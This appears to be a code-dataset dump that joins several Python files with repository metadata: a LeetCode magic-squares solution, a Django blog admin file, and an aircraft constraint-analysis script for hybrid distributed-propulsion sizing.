# (--gen_data) or run one simulation, pickle it, and plot every dimension.
if __name__ == "__main__":
    parser = ArgumentParser()
    parser.add_argument('--max_num', type=int, default=20)
    parser.add_argument('--max_seq', type=int, default=20)
    parser.add_argument('--gen_data', action='store_true')
    args = parser.parse_args()
    if args.gen_data:
        gen_data(args.max_num, args.max_seq)
        exit()
    history = sample(args.max_num)
    # NOTE(review): the open() handle here is never closed explicitly
    pickle.dump(history, open(f'data/sample{args.max_num}.pkl', 'wb'))
    for i in range(Z):
        display(history, dim=i)
|
[
"1085966850@qq.com"
] |
1085966850@qq.com
|
2926f51c360641246b891958422680130aa0ffaa
|
d8a1ad97cd53980369e908a5bb5744b5014d9c4e
|
/leetcode/840.magic-squares-in-grid.py
|
718e0a9b1a22f105a2ffe78402433c3e361d409e
|
[
"MIT"
] |
permissive
|
Lonitch/hackerRank
|
9f337b9a737c8abfbb2bae66221701fbc44c47ce
|
879c62dbab75aa73c7af2fdcb88a728a67f2ab8a
|
refs/heads/master
| 2022-08-26T15:02:56.343349
| 2022-07-07T00:52:35
| 2022-07-07T00:52:35
| 218,198,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,976
|
py
|
#
# @lc app=leetcode id=840 lang=python3
#
# [840] Magic Squares In Grid
#
# https://leetcode.com/problems/magic-squares-in-grid/description/
#
# algorithms
# Easy (36.30%)
# Likes: 108
# Dislikes: 972
# Total Accepted: 19.4K
# Total Submissions: 53K
# Testcase Example: '[[4,3,8,4],[9,5,1,9],[2,7,6,2]]'
#
# A 3 x 3 magic square is a 3 x 3 grid filled with distinct numbers from 1 to 9
# such that each row, column, and both diagonals all have the same sum.
#
# Given an grid of integers, how many 3 x 3 "magic square" subgrids are there?
# (Each subgrid is contiguous).
#
#
#
# Example 1:
#
#
# Input: [[4,3,8,4],
# [9,5,1,9],
# [2,7,6,2]]
# Output: 1
# Explanation:
# The following subgrid is a 3 x 3 magic square:
# 438
# 951
# 276
#
# while this one is not:
# 384
# 519
# 762
#
# In total, there is only one magic square inside the given grid.
#
#
# Note:
#
#
# 1 <= grid.length <= 10
# 1 <= grid[0].length <= 10
# 0 <= grid[i][j] <= 15
#
#
#
# @lc code=start
class Solution:
    def numMagicSquaresInside(self, grid: List[List[int]]) -> int:
        """Count the contiguous 3x3 magic-square subgrids of *grid*.

        A window qualifies when its nine values are distinct with maximum 9
        (given the 0..15 input range this pins the value set) and all three
        row sums, column sums, and both diagonal sums coincide.
        """
        rows, cols = len(grid), len(grid[0])
        if rows < 3 or cols < 3:
            return 0
        count = 0
        for r in range(rows - 2):
            for c in range(cols - 2):
                # flatten the 3x3 window row-major into 9 values
                window = [grid[r + dr][c + dc]
                          for dr in range(3) for dc in range(3)]
                if len(set(window)) != 9 or max(window) != 9:
                    continue
                # collect all eight line sums; a magic square has one value
                sums = {sum(window[3 * k:3 * k + 3]) for k in range(3)}
                for dc in range(3):
                    sums.add(window[dc] + window[3 + dc] + window[6 + dc])
                sums.add(window[0] + window[4] + window[8])
                sums.add(window[2] + window[4] + window[6])
                if len(sums) == 1:
                    count += 1
        return count
# @lc code=end
|
[
"invictumltd@gmail.com"
] |
invictumltd@gmail.com
|
2ec9721332ba5fd5e88768b46aac3a1ec52dd43e
|
79df5fd8e03b6c85b4bf111fab363fb9199b5aee
|
/blog/admin.py
|
d8b238d2ce21f1cc5198ae7a89d62882411f7306
|
[] |
no_license
|
gavinleey/blogproject
|
b3353c088ca48c7cf48ed7f9c8f8c1376df50883
|
d099586aaa5129c3cdb560335fb2d70c37afbc1e
|
refs/heads/master
| 2021-01-20T14:22:57.412610
| 2017-05-10T10:19:22
| 2017-05-10T10:19:22
| 90,581,063
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
from django.contrib import admin
# Register your models here.
from .models import Post, Category, Tag
class PostAdmin(admin.ModelAdmin):
    """Customises the Post changelist to show key metadata columns."""
    list_display = ['title', 'created_time', 'modified_time', 'category', 'author']
# register models with the default admin site
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"gavinlee_qd@163.com"
] |
gavinlee_qd@163.com
|
712494c2ee5b4dc76831fe44634b66447d5431a6
|
00c6ded41b84008489a126a36657a8dc773626a5
|
/.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPDP1P2_20210714170704.py
|
f31c77b51fea85e47b3f0b9001e527d45d16bf5a
|
[] |
no_license
|
12libao/DEA
|
85f5f4274edf72c7f030a356bae9c499e3afc2ed
|
1c6f8109bbc18c4451a50eacad9b4dedd29682bd
|
refs/heads/master
| 2023-06-17T02:10:40.184423
| 2021-07-16T19:05:18
| 2021-07-16T19:05:18
| 346,111,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,073
|
py
|
# author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysisPD as ca_pd
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun:
    """This is a power-based master constraints analysis.

    Computes the power loading P/W_TO required by each flight-phase
    constraint (take-off, stall, cruise, ceiling, turn, climb) for the
    turbofan share of a distributed-propulsion aircraft; (1 - Hp) of the
    total power is carried by the turbofan.
    """
    def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
        """
        :param beta: weight fraction
        :param Hp: P_motor/P_total
        :param n: number of motor
        :param K1: drag polar coefficient for 2nd order term
        :param K2: drag polar coefficient for 1st order term
        :param C_D0: the drag coefficient at zero lift
        :param C_DR: additional drag caused, for example, by external stores,
            braking parachutes or flaps, or temporary external hardware
        :return:
            power load: P_WTO
        """
        self.h = altitude
        self.v = velocity
        self.rho = atm.atmosphere(geometric_altitude=self.h).density()
        self.beta = beta
        self.hp = Hp
        self.n = number_of_motor
        # power lapse ratio
        self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
                                                           velocity=self.v).high_bypass_ratio_turbofan()
        # drag polar: CD = K1*CL^2 + K2*CL + CD0 (+ CDR + delta_CD0)
        self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
        self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
        self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
        self.cdr = C_DR
        self.w_s = wing_load
        self.g0 = 9.80665
        # turbofan carries (1 - hp) of the total installed power
        self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
        # Estimation of ΔCL and ΔCD due to distributed propulsion
        pd = ad.aerodynamics_with_pd(
            self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
        self.q = 0.5 * self.rho * self.v ** 2
        self.cl = self.beta * self.w_s / self.q
        # print(self.cl)
        self.delta_cl = pd.delta_lift_coefficient(self.cl)
        self.delta_cd0 = pd.delta_CD_0()
    def master_equation(self, n, dh_dt, dV_dt):
        # Mattingly master equation: required power loading for load factor
        # n, climb rate dh_dt [m/s], and acceleration dV_dt [m/s^2].
        cl = self.cl * n + self.delta_cl
        cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
        p_w = self.coefficient * \
            (self.q / (self.beta * self.w_s) *
             cd + dh_dt / self.v + dV_dt / self.g0)
        return p_w
    def cruise(self):
        # steady level flight: n = 1, no climb, no acceleration
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
            self, n=1, dh_dt=0, dV_dt=0)
        return p_w
    def climb(self, roc):
        # steady climb at rate-of-climb `roc` [m/s]
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
            self, n=1, dh_dt=roc, dV_dt=0)
        return p_w
    def level_turn(self, turn_rate=3, v=100):
        """
        assume 2 min for 360 degree turn, which is 3 degree/seconds
        assume turn at 300 knots, which is about 150 m/s
        """
        load_factor = (1 + ((turn_rate * np.pi / 180)
                            * v / self.g0) ** 2) ** 0.5
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
            self, n=load_factor, dh_dt=0, dV_dt=0)
        return p_w
    def take_off(self):
        """
        A320neo take-off speed is about 150 knots, which is about 75 m/s
        required runway length is about 2000 m
        K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
        """
        Cl_max_to = 2.3  # 2.3
        K_TO = 1.2  # V_TO / V_stall
        s_G = 1266
        p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
            s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
            3 / 2)
        return p_w
    def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
        # Fixed-point iteration on wing loading: delta_cl depends on W/S,
        # which in turn sets the stall-limited W/S; iterate until the
        # change is below 1.  Returns a wing loading, not a power loading.
        V_stall_ld = 62
        Cl_max_ld = 2.87
        a = 10
        w_s = 6000
        while a >= 1:
            cl = self.beta * w_s / self.q
            delta_cl = ad.aerodynamics_with_pd(
                self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
            W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
            W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
            W_S = min(W_S_1, W_S_2)
            a = abs(w_s-W_S)
            w_s = W_S
        return W_S
    def service_ceiling(self, roc=0.5):
        # ceiling defined by a residual climb capability of `roc` m/s
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
            self, n=1, dh_dt=roc, dV_dt=0)
        return p_w
    # ordered list of constraint functions for driver code to iterate
    # (plain/unbound functions: call as f(instance, ...))
    allFuncs = [take_off, stall_speed, cruise,
                service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Mattingly_Method_with_DP_electric:
    """This is a power-based master constraints analysis
    the difference between turbofun and electric for constrains analysis:
    1. assume the thrust_lapse = 1 for electric propution
    2. hp = 1 - hp_turbofun
    """

    def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
        """
        :param altitude: geometric altitude [m]
        :param velocity: true airspeed [m/s]
        :param beta: weight fraction
        :param wing_load: wing loading W_TO/S [N/m^2]
        :param Hp: P_motor/P_total (degree of hybridization)
        :param number_of_motor: number of motors
        :param C_DR: additional drag caused, for example, by external stores,
            braking parachutes or flaps, or temporary external hardware
        :return:
        power load: P_WTO
        """
        self.h = altitude
        self.v = velocity
        self.rho = atm.atmosphere(geometric_altitude=self.h).density()
        self.beta = beta
        self.hp = Hp  # this is the difference part compared with the turbofan
        self.n = number_of_motor
        # power lapse ratio: fixed constant instead of a thrust-lapse model
        # (the other difference from the turbofan variant)
        self.alpha = 0.75
        # drag-polar coefficients without distributed propulsion
        self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
        self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
        self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
        self.cdr = C_DR
        self.w_s = wing_load
        self.g0 = 9.80665
        self.coefficient = self.hp * self.beta * self.v / self.alpha
        # Estimation of ΔCL and ΔCD due to distributed propulsion
        pd = ad.aerodynamics_with_pd(
            self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
        self.q = 0.5 * self.rho * self.v ** 2
        self.cl = self.beta * self.w_s / self.q
        self.delta_cl = pd.delta_lift_coefficient(self.cl)
        self.delta_cd0 = pd.delta_CD_0()

    def master_equation(self, n, dh_dt, dV_dt):
        """Required power loading for load factor n, climb rate dh_dt [m/s]
        and flight-path acceleration dV_dt [m/s^2]."""
        cl = self.cl * n + self.delta_cl
        cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
        p_w = self.coefficient * \
            (self.q / (self.beta * self.w_s) *
             cd + dh_dt / self.v + dV_dt / self.g0)
        return p_w

    def cruise(self):
        """Steady level cruise: n = 1, no climb, no acceleration."""
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
            self, n=1, dh_dt=0, dV_dt=0)
        return p_w

    def climb(self, roc):
        """Steady climb at rate of climb `roc` [m/s]."""
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
            self, n=1, dh_dt=roc, dV_dt=0)
        return p_w

    def level_turn(self, turn_rate=3, v=100):
        """
        assume 2 min for 360 degree turn, which is 3 degree/seconds
        assume turn at 300 knots, which is about 150 m/s
        """
        load_factor = (1 + ((turn_rate * np.pi / 180)
                            * v / self.g0) ** 2) ** 0.5
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
            self, n=load_factor, dh_dt=0, dV_dt=0)
        return p_w

    def take_off(self):
        """
        A320neo take-off speed is about 150 knots, which is about 75 m/s
        required runway length is about 2000 m
        K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
        """
        Cl_max_to = 2.3  # 2.3
        K_TO = 1.2  # V_TO / V_stall
        s_G = 1266
        p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
            s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
            3 / 2)
        return p_w

    def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
        """Iterate the stall-limited wing loading to convergence
        (delta_cl depends on the wing loading itself)."""
        V_stall_ld = 62
        Cl_max_ld = 2.87
        a = 10
        w_s = 6000
        while a >= 1:
            cl = self.beta * w_s / self.q
            delta_cl = ad.aerodynamics_with_pd(
                self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
            W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
            W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
            W_S = min(W_S_1, W_S_2)
            a = abs(w_s - W_S)
            w_s = W_S
        return W_S

    def service_ceiling(self, roc=0.5):
        """Residual climb capability `roc` [m/s] at the ceiling."""
        p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
            self, n=1, dh_dt=roc, dV_dt=0)
        return p_w

    # FIX: stall_speed was missing from this list, which misaligned allFuncs[i]
    # with the constraint order used by the driver script (take-off, stall
    # speed, cruise, service ceiling, level turn; climb via allFuncs[-1]).
    # All three sibling analysis classes include it; now this one matches.
    allFuncs = [take_off, stall_speed, cruise,
                service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun:
    """This is a power-based master constraints analysis based on Gudmundsson_method"""

    def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
        """
        :param altitude: geometric altitude [m]
        :param velocity: true airspeed [m/s]
        :param beta: weight fraction
        :param wing_load: wing loading W_TO/S [N/m^2]
        :param Hp: degree of hybridization P_motor/P_total -- presumably; TODO confirm
        :param number_of_motor: number of motors used by the DP aerodynamics model
        :param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
        :param AR: wing aspect ratio, normally between 7 and 10
        :return:
        power load: P_WTO
        """
        self.h = altitude
        self.v = velocity
        self.beta = beta
        self.w_s = wing_load
        self.g0 = 9.80665
        self.hp = Hp
        self.n = number_of_motor
        self.rho = atm.atmosphere(geometric_altitude=self.h).density()
        # power lapse ratio (thrust lapse for a high-bypass-ratio turbofan)
        self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
                                                           velocity=self.v).high_bypass_ratio_turbofan()
        h = 2.43  # height of winglets
        b = 35.8
        # equation 9-88, If the wing has winglets the aspect ratio should be corrected
        ar_corr = AR * (1 + 1.9 * h / b)
        self.k = 1 / (np.pi * ar_corr * e)
        # (1 - hp): the turbofan carries the non-electric share of the power
        self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
        # Estimation of ΔCL and ΔCD
        pd = ad.aerodynamics_with_pd(
            self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
        self.q = 0.5 * self.rho * self.v ** 2
        cl = self.beta * self.w_s / self.q
        self.delta_cl = pd.delta_lift_coefficient(cl)
        self.delta_cd0 = pd.delta_CD_0()
        # TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
        cd_min = 0.02
        cd_to = 0.03
        cl_to = 0.8
        self.v_to = 68
        self.s_g = 1480
        self.mu = 0.04
        # apply the propulsion-induced increments to the baseline coefficients
        self.cd_min = cd_min + self.delta_cd0
        self.cl = cl + self.delta_cl
        self.cd_to = cd_to + self.delta_cd0
        self.cl_to = cl_to + self.delta_cl

    def cruise(self):
        """Power loading for steady level cruise (drag polar at 1-g lift)."""
        p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
        return p_w * self.coefficient

    def climb(self, roc):
        """Power loading for a steady climb at rate of climb `roc` [m/s]."""
        p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
        return p_w * self.coefficient

    def level_turn(self, turn_rate=3, v=100):
        """
        assume 2 min for 360 degree turn, which is 3 degree/seconds
        assume turn at 100 m/s
        """
        load_factor = (1 + ((turn_rate * np.pi / 180)
                            * v / self.g0) ** 2) ** 0.5
        q = 0.5 * self.rho * v ** 2
        p_w = q / self.w_s * (self.cd_min + self.k *
                              (load_factor / q * self.w_s + self.delta_cl) ** 2)
        return p_w * self.coefficient

    def take_off(self):
        """Power loading for the take-off ground run (Gudmundsson ground-roll
        balance: acceleration + drag + rolling friction terms)."""
        # q at V_TO/sqrt(2), the conventional mean dynamic pressure of the ground run
        q = self.q / 2
        p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
            1 - q * self.cl_to / self.w_s)
        return p_w * self.coefficient

    def service_ceiling(self, roc=0.5):
        """Power loading at the ceiling, evaluated at the best-rate-of-climb
        speed Vy (minimum power-required speed)."""
        vy = (2 / self.rho * self.w_s *
              (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
        q = 0.5 * self.rho * vy ** 2
        p_w = roc / vy + q / self.w_s * \
            (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
        # p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
        #     self.k * self.cd_min / 3) ** 0.5
        return p_w * self.coefficient

    def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
        """Fixed-point iteration for the stall-limited wing loading
        (delta_cl depends on the wing loading itself)."""
        V_stall_ld = 62
        Cl_max_ld = 2.87
        a = 10
        w_s = 6000
        while a >= 1:
            cl = self.beta * w_s / self.q
            delta_cl = ad.aerodynamics_with_pd(
                self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
            W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
            W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
            W_S = min(W_S_1, W_S_2)
            a = abs(w_s-W_S)
            w_s = W_S
        return W_S

    # Constraint functions in the order used by the driver script
    # (climb is addressed as allFuncs[-1]).
    allFuncs = [stall_speed, take_off, cruise,
                service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP_electric:
    """This is a power-based master constraints analysis based on Gudmundsson_method
    the difference between turbofun and electric for constrains analysis:
    1. assume the thrust_lapse = 1 for electric propution
    2. hp = 1 - hp_turbofun
    """

    def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
        """
        :param altitude: geometric altitude [m]
        :param velocity: true airspeed [m/s]
        :param beta: weight fraction
        :param wing_load: wing loading W_TO/S [N/m^2]
        :param Hp: degree of hybridization P_motor/P_total -- presumably; TODO confirm
        :param number_of_motor: number of motors used by the DP aerodynamics model
        :param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
        :param AR: wing aspect ratio, normally between 7 and 10
        :return:
        power load: P_WTO
        """
        self.h = altitude
        self.v = velocity
        self.beta = beta
        self.w_s = wing_load
        self.g0 = 9.80665
        self.hp = Hp  # this is the difference part compare with turbofun
        self.n = number_of_motor
        self.rho = atm.atmosphere(geometric_altitude=self.h).density()
        # power lapse ratio (fixed constant instead of a thrust-lapse model)
        self.alpha = 0.75  # this is the difference part compare with turbofun
        h = 2.43  # height of winglets
        b = 35.8
        # equation 9-88, If the wing has winglets the aspect ratio should be corrected
        ar_corr = AR * (1 + 1.9 * h / b)
        self.k = 1 / (np.pi * ar_corr * e)
        # hp (not 1 - hp): the motors carry the electric share of the power
        self.coefficient = self.hp*self.beta * self.v / self.alpha
        # Estimation of ΔCL and ΔCD
        pd = ad.aerodynamics_with_pd(
            self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
        self.q = 0.5 * self.rho * self.v ** 2
        cl = self.beta * self.w_s / self.q
        self.delta_cl = pd.delta_lift_coefficient(cl)
        self.delta_cd0 = pd.delta_CD_0()
        # TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
        cd_min = 0.02
        cd_to = 0.03
        cl_to = 0.8
        self.v_to = 68
        self.s_g = 1480
        self.mu = 0.04
        # apply the propulsion-induced increments to the baseline coefficients
        self.cd_min = cd_min + self.delta_cd0
        self.cl = cl + self.delta_cl
        self.cd_to = cd_to + self.delta_cd0
        self.cl_to = cl_to + self.delta_cl

    def cruise(self):
        """Power loading for steady level cruise (drag polar at 1-g lift)."""
        p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
        return p_w * self.coefficient

    def climb(self, roc):
        """Power loading for a steady climb at rate of climb `roc` [m/s]."""
        p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
        return p_w * self.coefficient

    def level_turn(self, turn_rate=3, v=100):
        """
        assume 2 min for 360 degree turn, which is 3 degree/seconds
        assume turn at 100 m/s
        """
        load_factor = (1 + ((turn_rate * np.pi / 180)
                            * v / self.g0) ** 2) ** 0.5
        q = 0.5 * self.rho * v ** 2
        p_w = q / self.w_s * (self.cd_min + self.k *
                              (load_factor / q * self.w_s + self.delta_cl) ** 2)
        return p_w * self.coefficient

    def take_off(self):
        """Power loading for the take-off ground run (Gudmundsson ground-roll
        balance: acceleration + drag + rolling friction terms)."""
        # q at V_TO/sqrt(2), the conventional mean dynamic pressure of the ground run
        q = self.q / 2
        p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
            1 - q * self.cl_to / self.w_s)
        return p_w * self.coefficient

    def service_ceiling(self, roc=0.5):
        """Power loading at the ceiling, evaluated at the best-rate-of-climb
        speed Vy (minimum power-required speed)."""
        vy = (2 / self.rho * self.w_s *
              (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
        q = 0.5 * self.rho * vy ** 2
        p_w = roc / vy + q / self.w_s * \
            (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
        # p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
        #     self.k * self.cd_min / 3) ** 0.5
        return p_w * self.coefficient

    def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
        """Fixed-point iteration for the stall-limited wing loading
        (delta_cl depends on the wing loading itself)."""
        V_stall_ld = 62
        Cl_max_ld = 2.87
        a = 10
        w_s = 6000
        while a >= 1:
            cl = self.beta * w_s / self.q
            delta_cl = ad.aerodynamics_with_pd(
                self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
            W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
            W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
            W_S = min(W_S_1, W_S_2)
            a = abs(w_s-W_S)
            w_s = W_S
        return W_S

    # Constraint functions in the order used by the driver script
    # (climb is addressed as allFuncs[-1]).
    allFuncs = [stall_speed, take_off, cruise,
                service_ceiling, level_turn, climb]
# Driver script: sweeps wing loading for 8 constraint cases and 8 method/plot
# combinations and draws the constraint diagrams.
# NOTE(review): indentation of this block was flattened in the source; the
# nesting below is reconstructed from the data flow -- confirm against the
# original repository.
if __name__ == "__main__":
    n = 250
    # wing-loading sweep [N/m^2]
    w_s = np.linspace(100, 9000, n)
    constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
                       'climb @S-L', 'climb @3000m', 'climb @7000m', 'feasible region-hybrid', 'feasible region-conventional']
    # each row: [altitude, velocity, beta, Hp]
    constrains = np.array([[0, 68, 0.988, 0.5], [0, 80, 1, 0.2], [11300, 230, 0.948, 0.8],
                           [11900, 230, 0.78, 0.8], [3000, 100, 0.984, 0.8], [0, 100, 0.984, 0.5],
                           [3000, 200, 0.975, 0.6], [7000, 230, 0.96, 0.7]])
    color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
    # k = 0..3: individual turbofan/electric analyses; k = 4,5: hybrid sums;
    # k = 6,7: conventional (Hp = 0) baselines
    methods = [ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun,
               ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun,
               ConstrainsAnalysis_Mattingly_Method_with_DP_electric,
               ConstrainsAnalysis_Gudmundsson_Method_with_DP_electric,
               ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun,
               ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun,
               ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun,
               ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun]
    m = constrains.shape[0]
    p_w = np.zeros([m, n, 8])
    # plots
    fig, ax = plt.subplots(3, 2, sharex=True, figsize=(10, 10))
    ax = ax.flatten()
    for k in range(8):
        for i in range(m):
            for j in range(n):
                h = constrains[i, 0]
                v = constrains[i, 1]
                beta = constrains[i, 2]
                hp = constrains[i, 3]
                # calculate p_w
                if k < 4:
                    problem = methods[k](h, v, beta, w_s[j], hp)
                    if i >= 5:
                        # rows 5..7 are climb cases; roc = 15, 10, 5 m/s
                        p_w[i, j, k] = problem.allFuncs[-1](problem, roc=15 - 5 * (i - 5))
                    else:
                        p_w[i, j, k] = problem.allFuncs[i](problem)
                elif k > 5:
                    # conventional baseline: zero hybridization
                    problem = methods[k](h, v, beta, w_s[j], Hp=0)
                    if i >= 5:
                        p_w[i, j, k] = problem.allFuncs[-1](problem, roc=15 - 5 * (i - 5))
                    else:
                        p_w[i, j, k] = problem.allFuncs[i](problem)
                elif k == 4:
                    # hybrid Mattingly: turbofan (k=0) + electric (k=2)
                    if i == 1:
                        problem = methods[k](h, v, beta, w_s[j], hp)
                        p_w[i, j, k] = problem.allFuncs[i](problem)
                    else:
                        p_w[i, j, k] = p_w[i, j, 0] + p_w[i, j, 2]
                else:
                    # hybrid Gudmundsson: turbofan (k=1) + electric (k=3)
                    if i == 1:
                        problem = methods[k](h, v, beta, w_s[j], hp)
                        p_w[i, j, k] = problem.allFuncs[i](problem)
                    else:
                        p_w[i, j, k] = p_w[i, j, 1] + p_w[i, j, 3]

            # polynomial + trig basis used to smooth the stall-speed boundary
            def func(x, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10):
                f = a0 + a1*x + a2*x**2 + a3*x**3 + a4*x**4 + a5 * \
                    np.sin(x) + a6*np.cos(x) + a7*x**5 + \
                    a8*x**6 + a9*x**7 + a10*x**8
                return f

            if k <= 5:
                if i == 1:
                    # stall speed is a vertical boundary (constant W/S)
                    # NOTE(review): p_w[i, :] lacks the k index here (a 2-D
                    # slice is passed to plot) -- likely meant p_w[i, :, k];
                    # confirm against the original repository.
                    ax[k].plot(p_w[i, :], np.linspace(0, 50, n),
                               linewidth=1, color=color[i], label=constrains_name[i])
                    xdata, ydata = p_w[i, :, k], np.linspace(0, 150, n)
                    popt, _ = curve_fit(func, xdata, ydata)
                    p_w[i, :, k] = func(w_s, popt[0], popt[1], popt[2],
                                        popt[3], popt[4], popt[5], popt[6], popt[7], popt[8], popt[9], popt[10])
                else:
                    ax[k].plot(w_s, p_w[i, :, k], color=color[i],
                               linewidth=1, alpha=1, label=constrains_name[i])
            else:
                # conventional baselines are drawn dashed on the hybrid axes
                if i == 1:
                    ax[k-2].plot(p_w[i, :, k], np.linspace(
                        0, 150, n), color=color[i], linewidth=1, alpha=0.5, linestyle='--')
                else:
                    ax[k-2].plot(w_s, p_w[i, :, k], color=color[i],
                                 linewidth=1, alpha=0.5, linestyle='--')
        if k <= 5:
            # feasible region: above the envelope of all constraint curves
            ax[k].fill_between(w_s, np.amax(p_w[0:m, :, k], axis=0),
                               200, color='b', alpha=0.5, label=constrains_name[-2])
            ax[k].set_xlim(200, 9000)
            ax[k].grid()
            if k <= 3:
                ax[k].set_ylim(0, 50)
            else:
                ax[k].set_ylim(0, 150)
        else:
            # rescale the stall boundary for the conventional overlay
            p_w[1, :, k] = 200 / (p_w[1, -1, k] - p_w[1, 20, k]) * (w_s - p_w[1, 2, k])
            ax[k-2].fill_between(w_s, np.amax(p_w[0:m, :, k], axis=0),
                                 200, color='r', alpha=0.5, label=constrains_name[-1])
    handles, labels = plt.gca().get_legend_handles_labels()
    fig.legend(handles, labels, bbox_to_anchor=(0.125, 0.02, 0.75, 0.25), loc="lower left",
               mode="expand", borderaxespad=0, ncol=4, frameon=False)
    hp = constrains[:, 3]
